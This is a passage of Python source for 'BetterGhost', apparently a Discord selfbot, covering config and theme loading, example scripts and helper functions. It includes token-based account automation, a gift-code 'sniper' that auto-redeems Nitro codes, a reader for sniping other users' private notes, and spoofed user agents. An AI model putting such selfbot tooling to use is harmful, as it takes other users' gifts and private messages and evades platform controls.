Never gonna give, never gonna give
(Give you up)
(Ooh) Never gonna give, never gonna give
(Give you up)
We've known each other for so long
Your heart's been aching but you're too shy to say it
Inside we both know what's been going on
We know the game and we're gonna play it
I just wanna tell you how I'm feeling
Gotta make you understand
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt...""")
f.close()
if not os.path.isfile("scripts/consolecommand-example.py"):
f = open("scripts/consolecommand-example.py", "w")
f.write("""
@BetterGhost.command(name="consolecommand", description="console command test", usage="consoletest", aliases=["consoleCommand-consoletest"])
async def consoletest(ctx):
print("This is a command that can be executed in the console.")
print("You can create this commands by adding consoleCommand-{commandname} in the commands aliases.")
print("")
print("Any command that has that in the aliases will be able to be executed in the console and in discord so prints will be better.")
print("FYI: Arguments currently are not possible.")
""")
f.close()
if not os.path.isfile('scripts/example.py'):
f = open('scripts/example.py', "w")
f.write('''
@BetterGhost.command(name="example", description="Example custom script.", usage="example")
async def example(BetterGhost):
exampleEmbed = discord.Embed(
title="Example Embed",
description="""
An example embed to display what you can do in scripts.
Check `scripts/example.py` to see the code!
** **
BetterGhost scripts are all created in python using discord.py so you can use any feature from discord.py.
""",
color=__embedcolour__
)
exampleEmbed.add_field(name="Variables", value="""
**\_\_embedtitle\_\_** : Theme's embed title.
**\_\_embedcolour\_\_** : Theme's embed colour.
**\_\_embedfooter\_\_** : Theme's embed footer.
**\_\_embedimage\_\_** : Theme's embed image url.
**\_\_embedfooterimage\_\_** : Theme's embed footer image url.
**\_\_embedemoji\_\_** : Theme's global emoji.
**\_\_deletetimeout\_\_** : Config delete timeout (seconds).
""")
exampleEmbed.set_thumbnail(url=__embedimage__)
exampleEmbed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
await BetterGhost.send("Hello World!", embed=exampleEmbed)
''')
f.close()
if json.load(open("config.json"))["token"] == "":
os.system("cls")
os.system("clear")
print("")
print("Please input your Discord token below.".center(os.get_terminal_size().columns))
print("")
token = input()
config = json.load(open("config.json"))
config["token"] = (token)
json.dump(config, open('config.json', 'w'), sort_keys=False, indent=4)
ccmd_file = open('customcommands.json')
ccmd = json.load(ccmd_file)
def updateTheme(theme):
themeJson = json.load(open(f"themes/{theme}"))
if "consolecolour" not in themeJson:
themeJson["consolecolour"] = "#3B79FF"
if "consolemode" not in themeJson:
themeJson["consolemode"] = "new"
if "embedlargeimage" not in themeJson:
themeJson["embedlargeimage"] = ""
json.dump(themeJson, open(f"themes/{theme}", "w"), sort_keys=False, indent=4)
for theme in os.listdir("themes"):
if theme.endswith(".json"):
updateTheme(theme)
update_config()
CONFIG = json.load(open("config.json"))
GIVEAWAYBOTS = json.load(codecs.open("giveawaybots.json", encoding="UTF-8"))
__token__ = CONFIG["token"]
__prefix__ = CONFIG["prefix"]
# __loadonstartup__ = CONFIG["load_on_startup"]
__deletetimeout__ = CONFIG["delete_timeout"]
__theme__ = CONFIG["theme"]
__sounds__ = CONFIG["sounds"]
__riskmode__ = CONFIG["riskmode"]
__nitrosniper__ = CONFIG["snipers"]["nitro"]
__privnotesniper__ = CONFIG["snipers"]["privnote"]
__giveawaysniper__ = CONFIG["snipers"]["giveaway"]
__giveawaysniperui__ = CONFIG["giveaway_sniper_ui"]
__ticketsniper__ = CONFIG["snipers"]["tickets"]
__nitrowebhook__ = CONFIG["webhooks"]["nitro"]
__privnotewebhook__ = CONFIG["webhooks"]["privnote"]
__giveawaywebhook__ = CONFIG["webhooks"]["giveaway"]
__ghostpingwebhook__ = CONFIG["webhooks"]["ghostping"]
__friendsupdatewebhook__ = CONFIG["webhooks"]["friendsupdate"]
__dmtypingwebhook__ = CONFIG["webhooks"]["dmtyping"]
__guildleavewebhook__ = CONFIG["webhooks"]["guildleave"]
__selfbotwebhook__ = CONFIG["webhooks"]["selfbot"]
__ticketswebhook__ = CONFIG["webhooks"]["tickets"]
__giveawayjoindelay__ = CONFIG["giveaway_join_delay"]
__custommotd__ = CONFIG["motd"]["custom"]
__custommotdtext__ = CONFIG["motd"]["custom_text"]
__selfbotdetect__ = CONFIG["detections"]["selfbot"]
__ghostpingdetect__ = CONFIG["detections"]["ghostping"]
__bandetect__ = CONFIG["detections"]["bans"]
__deletedmessagesdetect__ = CONFIG["detections"]["deletedmessages"]
__webhookmodificationdetect__ = CONFIG["detections"]["webhookmodification"]
__friendsupdatedetect__ = CONFIG["detections"]["friendsupdate"]
__dmtypingdetect__ = CONFIG["detections"]["dmtyping"]
__guildleavedetect__ = CONFIG["detections"]["guildleave"]
THEME = json.load(open(f"themes/{__theme__}.json"))
__embedtitle__ = THEME["embedtitle"]
__embedcolour__ = int(THEME["embedcolour"].replace('#', '0x'), 0)
__embedcolourraw__ = THEME["embedcolour"]
__embedfooter__ = THEME["embedfooter"]
__embedemoji__ = THEME["globalemoji"]
__embedimage__ = THEME["embedimage"]
__embedlargeimage__ = THEME["embedlargeimage"]
__embedfooterimage__ = THEME["embedfooterimage"]
__embedmode__ = CONFIG["embed_mode"]
__consolemode__ = THEME["consolemode"]
__ignoredservers__ = CONFIG["ignored_servers"]
__consolecolour__ = THEME["consolecolour"]
__ghostloaded__ = False
__guildleaveignoredservers__ = CONFIG["ignored_servers"]["guildleave"]
nsfwTypes = ["boobs", "ass", "hentai", "porngif", "pussy", "tits", "tittydrop", "tittypop", "titty", "femboy"]
now = datetime.now()
fake = Faker()
def getCurrentTime():
return datetime.now().strftime("%H:%M:%S")
def print_important(message):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cPurple}[IMPORTANT] {fg.cWhite}{message}")
def print_info(message):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cYellow}[INFORMATION] {fg.cWhite}{message}")
def print_cmd(command):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[COMMAND] {fg.cWhite}{command}")
def print_sharecmd(author, command):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[SHARE COMMAND] {fg.cWhite}({author}) {command}")
def print_error(error):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cRed}[ERROR] {fg.cWhite}{error}")
def print_detect(message):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cPink}[DETECT] {fg.cWhite}{message}")
def print_sniper(message):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cOrange}[SNIPER] {fg.cWhite}{message}")
def print_sniper_info(firstmessage, secondmessage):
spaces = ""
# for i in range(len(f"[{getCurrentTime()}]")):
# spaces += " "
print(f"{printSpaces}{spaces} {fg.cYellow}{firstmessage}: {fg.cGrey}{secondmessage}")
def is_me(m):
return m.author == BetterGhost.user
def restart_bot():
python = sys.executable
os.execl(python, python, * sys.argv)
def close_bot():
os.system("taskkill /IM BetterGhost.exe")
def is_windows():
return os.name == "nt"
def is_linux():
return os.name == "posix"
def GetUUID():
if is_windows():
cmd = 'wmic csproduct get uuid'
uuid = str(subprocess.check_output(cmd))
pos1 = uuid.find("\\n")+2
uuid = uuid[pos1:-15]
elif is_linux():
uuid = str(subprocess.Popen(["dmidecode", "-s", "system-uuid"], stdout=subprocess.PIPE).communicate()[0]).replace("b'", "").replace("\\n'", "")
return uuid
# Found: https://stackoverflow.com/a/64676639
def hex_to_rgb(hex_string):
r_hex = hex_string[1:3]
g_hex = hex_string[3:5]
b_hex = hex_string[5:7]
red = int(r_hex, 16)
green = int(g_hex, 16)
blue = int(b_hex, 16)
return red, green, blue
def get_nsfw(type):
types = nsfwTypes
if type not in types:
return "Invalid type."
else:
for type2 in types:
if type == type2:
request = requests.get(f"https://www.reddit.com/r/{type2}/random.json", headers={'User-agent': get_random_user_agent()}).json()
url = request[0]["data"]["children"][0]["data"]["url"]
if "redgifs" in str(url):
url = request[0]["data"]["children"][0]["data"]["preview"]["reddit_video_preview"]["fallback_url"]
return url
def get_nsfw_custom_type(type):
request = requests.get(f"https://www.reddit.com/r/{type}/random.json", headers={'User-agent': get_random_user_agent()}).json()
url = request[0]["data"]["children"][0]["data"]["url"]
if "redgifs" in str(url):
url = request[0]["data"]["children"][0]["data"]["preview"]["reddit_video_preview"]["fallback_url"]
return url
def send_notification(title, message, duration):
if CONFIG["toastnotifications"]:
if sys.platform == "win32":
plyer.notification.notify(
title=title,
message=message,
app_name="BetterGhost",
app_icon="icon.ico",
timeout=duration,
toast=True
)
elif sys.platform == "darwin":
pync.notify(message, title=title)
def claim_nitro(code, userToken):
URL = f'https://discordapp.com/api/v6/entitlements/gift-codes/{code}/redeem'
result = requests.post(URL, headers={'Authorization': userToken}).text
if 'nitro' in result:
return "Valid Code"
else:
return "Invalid Code"
def read_privnote(url):
content = pn.read_note(link=url)
return content
def get_random_user_agent():
userAgents = ["Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3075.83 Safari/537.32", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1", "Mozilla/5.0 (Windows NT 8.0; WOW64) AppleWebKit/536.24 (KHTML, like Gecko) Chrome/32.0.2019.89 Safari/536.24", "Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.41 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3058.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3258.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36", "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2599.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.35 (KHTML, like Gecko) Chrome/27.0.1453.0 Safari/537.35", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.139 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9757 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3258.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1", "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2151.2 Safari/537.36", "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1204.0 Safari/537.1", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/67.0.3387.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9757 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3359.181 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3251.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538 (KHTML, like Gecko) Chrome/36 Safari/538", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.355.0 Safari/533.3", "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.4 Safari/532.0", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.35 (KHTML, like Gecko) Chrome/27.0.1453.0 Safari/537.35", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3359.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3057.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.14", "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 TC2", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3058.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3258.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2531.0 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36,gzip(gfe)", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2264.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.29 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.150 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.45 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.14", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2714.0 Safari/537.36", "24.0.1284.0.0 (Windows NT 5.1) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.1284.0.3.742.3 Safari/534.3", "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1864.6 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Chrome/36.0.1985.125 CrossBrowser/36.0.1985.138 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Avast/70.0.917.102", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1615.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.14", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3608.0 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3251.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/54.2.133 Chrome/48.2.2564.133 Safari/537.36", "24.0.1284.0.0 (Windows NT 5.1) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.1284.0.3.742.3 Safari/534.3", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/54.2.133 Chrome/48.2.2564.133 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/54.2.133 Chrome/48.2.2564.133 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2427.7 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.61 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Chrome/36.0.1985.125 CrossBrowser/36.0.1985.138 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.45 Safari/537.36", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.29 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.104 Safari/537.36", "24.0.1284.0.0 (Windows NT 5.1) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.1284.0.3.742.3 Safari/534.3", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36,gzip(gfe)", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.29 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.45 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.45", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.150 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.102 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2419.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Chrome/36.0.1985.125 CrossBrowser/36.0.1985.138 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1204.0 Safari/537.1", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2700.0 Safari/537.36#", "Mozilla/5.0 (Windows NT 10.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.16", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.68 Safari/537.36", "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.43 Safari/535.1", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2700.0 Safari/537.36#", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.114 Safari/537.36", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538 (KHTML, like Gecko) Chrome/36 Safari/538", "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.43 Safari/535.1", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (X11; Linux x86_64; 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/17.0.1410.63 Safari/537.31", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2583.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2151.2 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/536.36 (KHTML, like Gecko) Chrome/67.2.3.4 Safari/536.36", "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.5", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.69 Safari/537.36", "Mozilla/5.0 (Windows NT 10.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Safari/537.36 EdgA/41.0.0.1662", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1"]
userAgent = random.choice(userAgents)
return userAgent
def avatarUrl(id, avatar):
url = ""
if not str(avatar).startswith("http"):
if str(avatar).startswith("a_"):
url = f"https://cdn.discordapp.com/avatars/{id}/{avatar}.gif?size=1024"
else:
url = f"https://cdn.discordapp.com/avatars/{id}/{avatar}.png?size=1024"
return url
else:
return avatar
def iconUrl(id, icon):
url = ""
if str(icon).startswith("a_"):
url = f"https://cdn.discordapp.com/avatars/{id}/{icon}.gif?size=1024"
else:
url = f"https://cdn.discordapp.com/avatars/{id}/{icon}.png?size=1024"
return icon
def resource_path(relative_path):
# try:
# base_path = sys._MEIPASS
# except Exception:
# base_path = os.path.abspath(".")
# return os.path.join(base_path, relative_path)
return relative_path
def get_friends(token):
request = requests.get("https://discord.com/api/users/@me/relationships", headers={"Authorization": token})
json = request.json()
friends = []
for item in json:
if item["type"] == 1:
friends.append(item["user"])
return friends
async def constant_input(bot):
while True:
message = input().lower()
cmd = ""
try:
msgs = bot.cached_messages
ctx = await bot.get_context(msgs[0])
except IndexError:
print("Couldnt get context from cached message. Send a message in discord and try again.")
else:
consoleCommand = False
for command in bot.commands:
if command.name == message:
for alias in command.aliases:
if "consolecommand" in alias.lower():
consoleCommand = True
cmd = alias
break
if consoleCommand:
await ctx.invoke(bot.get_command(cmd))
else:
print("That command can't be ran in the console.")
class Config():
def __init__(self):
self.json = json.load(open("config.json"))
self.token = self.json["token"]
self.prefix = self.json["prefix"]
self.deleteTimeout = self.json["delete_timeout"]
self.theme = self.json["theme"]
self.giveawayJoinDelay = self.json["giveaway_join_delay"]
def getConfig():
return json.load(open("config.json"))
def saveConfig(data):
return json.dump(data, open("config.json", "w"), indent=4, sort_keys=False)
def changeToken(newToken):
global __token__
__token__ = newToken
cfg = Config.getConfig()
cfg["token"] = newToken
Config.saveConfig(cfg)
def changePrefix(newPrefix):
global __prefix__
__prefix__ = newPrefix
BetterGhost.command_prefix = newPrefix
cfg = Config.getConfig()
cfg["prefix"] = newPrefix
Config.saveConfig(cfg)
def changeDeleteTimeout(newDeleteTimeout):
global __deletetimeout__
newDeleteTimeout = int(newDeleteTimeout)
__deletetimeout__ = newDeleteTimeout
cfg = Config.getConfig()
cfg["delete_timeout"] = newDeleteTimeout
Config.saveConfig(cfg)
def changeGiveawayJoinDelay(newJoinDelay):
global __giveawayjoindelay__
newJoinDelay = int(newJoinDelay)
__giveawayjoindelay__ = newJoinDelay
cfg = Config.getConfig()
cfg["giveaway_join_delay"] = newJoinDelay
Config.saveConfig(cfg)
def changeTheme(newTheme):
global __embedtitle__, __embedcolour__, __embedfooter__, __embedemoji__, __embedimage__, __embedfooterimage__, __embedcolourraw__, __theme__, __embedlargeimage__
__embedtitle__ = json.load(open(f"themes/{newTheme}.json"))["embedtitle"]
__embedcolour__ = int(json.load(open(f"themes/{newTheme}.json"))["embedcolour"].replace('#', '0x'), 0)
__embedcolourraw__ = json.load(open(f"themes/{newTheme}.json"))["embedcolour"]
__embedfooter__ = json.load(open(f"themes/{newTheme}.json"))["embedfooter"]
__embedemoji__ = json.load(open(f"themes/{newTheme}.json"))["globalemoji"]
__embedimage__ = json.load(open(f"themes/{newTheme}.json"))["embedimage"]
__embedfooterimage__ = json.load(open(f"themes/{newTheme}.json"))["embedfooterimage"]
__embedlargeimage__ = json.load(open(f"themes/{newTheme}.json"))["embedlargeimage"]
__theme__ = newTheme
cfg = Config.getConfig()
cfg["theme"] = newTheme
Config.saveConfig(cfg)
if sys.platform == "win32":
ccolourred, ccolourgreen, ccolourblue = hex_to_rgb(__consolecolour__)
fg.consoleColour = Style(RgbFg(ccolourred, ccolourgreen, ccolourblue))
fg.cRed = Style(RgbFg(255, 81, 69))
fg.cOrange = Style(RgbFg(255, 165, 69))
fg.cYellow = Style(RgbFg(255, 255, 69))
fg.cGreen = Style(RgbFg(35, 222, 57))
fg.cBlue = Style(RgbFg(69, 119, 255))
fg.cPurple = Style(RgbFg(177, 69, 255))
fg.cPink = Style(RgbFg(255, 69, 212))
fg.cGrey = Style(RgbFg(207, 207, 207))
fg.cBrown = Style(RgbFg(199, 100, 58))
fg.cBlack = Style(RgbFg(0, 0, 0))
fg.cWhite = Style(RgbFg(255, 255, 255))
elif sys.platform == "linux" or sys.platform == "darwin":
fg.consoleColour = colorama.Fore.BLUE
fg.cRed = colorama.Fore.RED
fg.cOrange = colorama.Fore.YELLOW
fg.cYellow = colorama.Fore.YELLOW
fg.cGreen = colorama.Fore.GREEN
fg.cBlue = colorama.Fore.BLUE
fg.cPurple = colorama.Fore.MAGENTA
fg.cPink = colorama.Fore.MAGENTA
fg.cGrey = colorama.Fore.WHITE
fg.cBlack = colorama.Fore.BLACK
fg.cWhite = colorama.Fore.RESET
if is_windows():
os.system("cls")
os.system(f"title BetterGhost")
elif is_linux():
os.system("clear")
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
BetterGhost = commands.Bot(command_prefix=__prefix__, self_bot=True, status=discord.Status.try_value(status))
BetterGhost.remove_command('help')
BetterGhost.launch_time = datetime.utcnow()
botStartTime = time.time()
giveawayBots = []
for index in GIVEAWAYBOTS:
giveawayBots.append(int(index))
version = "2.3.8"
cycleStatusText = ""
cycleStatus = False
discordServer = "https://ghost.cool/invite/"
uwuifyEnabled = False
channelBlankChar = ""
spammingMessages = False
rickRollEnabled = False
nukingToken = False
consoleMode = __consolemode__
consoleModes = ["new", "new2", "new3", "new4", "bear", "old", "react", "rise", "nighty", "rainbow"]
scriptsList = []
afkMode = CONFIG["afkmode"]["enabled"]
def include(filename):
global scriptsList
if os.path.exists(filename):
scriptsList.append(filename)
exec(codecs.open(filename, encoding="utf-8").read(), globals(), locals())
